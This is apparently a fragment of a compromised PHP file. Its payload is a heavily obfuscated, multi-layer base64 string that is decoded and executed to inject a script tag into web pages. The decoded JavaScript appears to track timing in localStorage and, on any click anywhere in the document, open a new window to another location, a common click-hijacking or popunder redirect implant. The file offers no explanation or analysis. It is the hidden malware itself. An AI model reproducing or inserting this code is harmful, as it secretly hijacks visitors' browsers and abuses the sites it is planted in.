TmtZbE5rVWxOek1sTnpRbE1qQWxOek1sTmpFbE56WWxOalVsTmpRbE5EUWxOakVsTnpRbE5qVWxORFlsTmtZbE56SWxORGdsTmtZbE56VWxOeklsTnpNbE1qQWxNMFFsTWpBbE5qY2xOalVsTnpRbE5UUWxOamtsTmtRbE5qVWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpnbE5qQWxNalFsTjBJbE5qZ2xOa1lsTnpNbE56UWxOMFFsTWtRbE5qZ2xOelVsTnpJbE56TWxOakFsTWprbE0wSWxNRVFsTUVFbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOamtsTmpZbE1qQWxNamdsTnpNbE5qRWxOellsTmpVbE5qUWxORFFsTmpFbE56UWxOalVsTkRZbE5rWWxOeklsTkVRbE5qa2xOa1VsTnpRbE56TWxNakFsTWpZbE1qWWxNakFsTnpNbE5qRWxOellsTmpVbE5qUWxORFFsTmpFbE56UWxOalVsTkRZbE5rWWxOeklsTkRnbE5rWWxOelVsTnpJbE56TWxNamtsTWpBbE4wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE56UWxOeklsTnprbE1qQWxOMElsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTmpNbE5rWWxOa1VsTnpNbE56UWxNakFsTnpNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE5EUWxOakVsTnpRbE5qVWxORFlsTmtZbE56SWxORVFsTmprbE5rVWxOelFsTnpNbE1qQWxNMFFsTWpBbE56QWxOakVsTnpJbE56TWxOalVsTkRrbE5rVWxOelFsTWpnbE56TWxOakVsTnpZbE5qVWxOalFsTkRRbE5qRWxOelFsTmpVbE5EWWxOa1lsTnpJbE5FUWxOamtsTmtVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOek1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTkRRbE5qRWxOelFsTmpVbE5EWWxOa1lsTnpJbE5EZ2xOa1lsTnpVbE56SWxOek1sTWpBbE0wUWxNakFsTnpBbE5qRWxOeklsTnpNbE5qVWxORGtsTmtVbE56UWxNamdsTnpNbE5qRWxOellsTmpVbE5qUWxORFFsTmpFbE56UWxOalVsTkRZbE5rWWxOeklsTkRnbE5rWWxOelVsTnpJbE56TWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE5qTWxOa1lsTmtVbE56TWxOelFsTWpBbE5rUWxOamtsTmtVbE56UWxOek1sTkRRbE5qa2xOallsTmpZbE1qQWxNMFFsTWpBbE5qY2xOalVsTnpRbE5FUWxOamtsTmtVbE56UWxOek1sTkRRbE5qa2xOallsTmpZbE1qZ2xOa1VsTmtZbE56Y2xORFFsTmpFbE56UWxOalVsTWtNbE1qQWxOek1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTkRRbE5qRWxOelFsTmpVbE5EWWxOa1lsTnpJbE5FUWxOamtsTmtVbE56UWxOek1sTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOak1sTmtZbE5rVWxOek1sTnpRbE1qQWxOamdsTmtZbE56VWxOeklsTnpNbE5EUWxOamtsTmpZbE5qWWxNakFsTTBRbE1qQWxOamNsTmpVbE56UWxORGdsTmtZbE56VWxOeklsTnpNbE5EUWxOamtsTmpZbE5qWWxNamdsTmtVbE5rWWxOemNsTkRRbE5qRWxOelFsTmpVbE1rTWxNakFsTnpNbE56UWxOa1lsTnpJbE5qRWxOamNsTmpVbE5EUWxOakVsTnpRbE5qVWxORFlsTmtZbE56SWxORGdsTmtZbE56VWxOeklsTnpNbE1qa2xNMElsTUVRbE1FRWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOamtsTmpZbE1qQWxNamdsTmpnbE5rWWxOelVsTnpJbE56TWxORFFsTmprbE5qWWxOallsTWpBbE0wVWxNMFFsTWpBbE5qRWxOa01sTmtNbE5rWWxOemNsTmpVbE5qUWxORGdsTmtZbE56VWxOeklsTnpNbE1qa2xNakFsTjBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOek1sTmpFbE56WWxOalVsTlRRbE5qRWxOeklsTmpjbE5qVWxOelFsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxOek1sTlRRbE5rWWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpnbE56UWxOakVsTnpJbE5qY2xOalVsTnpRbE56TWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOek1sTmpVbE56UWxOVFFsTmprbE5rUWxOalVsTlRRbE5rWWxOVE1sTnpRbE5rWWxOeklsTmpFbE5qY2xOalVsTWpnbE5qQWxNalFsTjBJbE5qZ2xOa1lsTnpNbE56UWxOMFFsTWtRbE5qZ2xOelVsTnpJbE56TWxOakFsTWtNbE1qQWxOa1VsTmtZbE56Y2xORFFsTmpFbE56UWxOalVsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOMFFsTUVRbE1FRWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTmprbE5qWWxNakFsTWpnbE5rUWxOamtsTmtVbE56UWxOek1sTkRRbE5qa2xOallsTmpZbE1qQWxNMFVsTTBRbE1qQWxOeklsTmpVbE56TWxOelFsTkVRbE5qa2xOa1VsTnpVbE56UWxOalVsTnpNbE1qa2xNakFsTjBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxOamtsTmpZbE1qQWxNamdsTmtVbE5qVWxOemNsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNamtsTWpBbE4wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE56TWxOalVsTnpRbE5UUWxOamtsTmtRbE5qVWxOVFFsTmtZbE5UTWxOelFsTmtZbE56SWxOakVsTmpjbE5qVWxNamdsTmpBbE1qUWxOMElsTmpnbE5rWWxOek1sTnpRbE4wUWxNa1FsTmtRbE5rVWxOelFsTnpNbE5qQWxNa01sTWpBbE5rVWxOa1lsTnpjbE5EUWxOakVsTnpRbE5qVWxNamtsTTBJbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTnpjbE5qa2xOa1VsTmpRbE5rWWxOemNsTWtVbE5rWWxOekFsTmpVbE5rVWxNamdsTmtVbE5qVWxOemNsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNa01sTWpBbE1qSWxOVVlsTmpJbE5rTWxOakVsTmtVbE5rSWxNaklsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE56TWxOalVsTnpRbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTkRFbE56TWxOVFlsTmprbE56TWxOamtsTnpRbE5qVWxOalFsTWpnbE5rVWxOalVsTnpjbE5FTWxOa1lsTmpNbE5qRWxOelFsTmprbE5rWWxOa1VsTWprbE0wSWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTjBRbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE4wUWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE4wUWxNakFsTmpNbE5qRWxOelFsTmpNbE5qZ2xNakFsTWpnbE5qVWxOeklsTnpJbE5rWWxOeklsTWprbE1qQWxOMElsTWpBbE56WWxOamtsTnpNbE5qa2xOelFsTkVVbE5qVWxOemNsTkVNbE5rWWxOak1sTmpFbE56UWxOamtsTmtZbE5rVWxNamdsTnpRbE5qRWxOeklsTmpjbE5qVWxOelFsTnpNbE1rTWxNakFsTmpnbE5rWWxOek1sTnpRbE1rTWxNakFsTmtVbE5rWWxOemNsTkRRbE5qRWxOelFsTmpVbE1qa2xNMElsTWpBbE4wUWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxNakFsTWpBbE1qQWxNakFsTjBRbE1qQWxOalVsTmtNbE56TWxOalVsTWpBbE4wSWxNakFsTnpZbE5qa2xOek1sTmprbE56UWxORVVsTmpVbE56Y2xORU1sTmtZbE5qTWxOakVsTnpRbE5qa2xOa1lsTmtVbE1qZ2xOelFsTmpFbE56SWxOamNsTmpVbE56UWxOek1sTWtNbE1qQWxOamdsTmtZbE56TWxOelFsTWtNbE1qQWxOa1VsTmtZbE56Y2xORFFsTmpFbE56UWxOalVsTWprbE0wSWxNakFsTjBRbE1FUWxNRUVsTWpBbE1qQWxNakFsTWpBbE4wUWxNRVFsTUVFbE1qQWxNakFsTWpBbE1qQWxOalFsTmtZbE5qTWxOelVsTmtRbE5qVWxOa1VsTnpRbE1rVWxOakVsTmpRbE5qUWxORFVsTnpZbE5qVWxOa1VsTnpRbE5FTWxOamtsTnpNbE56UWxOalVsTmtVbE5qVWxOeklsTWpnbE1qSWxOak1sTmtNbE5qa2xOak1sTmtJbE1qSWxNa01sTWpBbE5qY2xOa01sTmtZbE5qSWxOakVsTmtNbE5ETWxOa01sTmprbE5qTWxOa0lsTWprbE1FUWxNRUVsTjBRbE1qa2xNamdsTWprbE0wTWxNa1lsTnpNbE5qTWxOeklsTmprbE56QWxOelFsTTBVaUtTazhMM05qY21sd2REND0iKSk8L3NjcmlwdD4nOyB9IA==')); $lnKPN(); ?>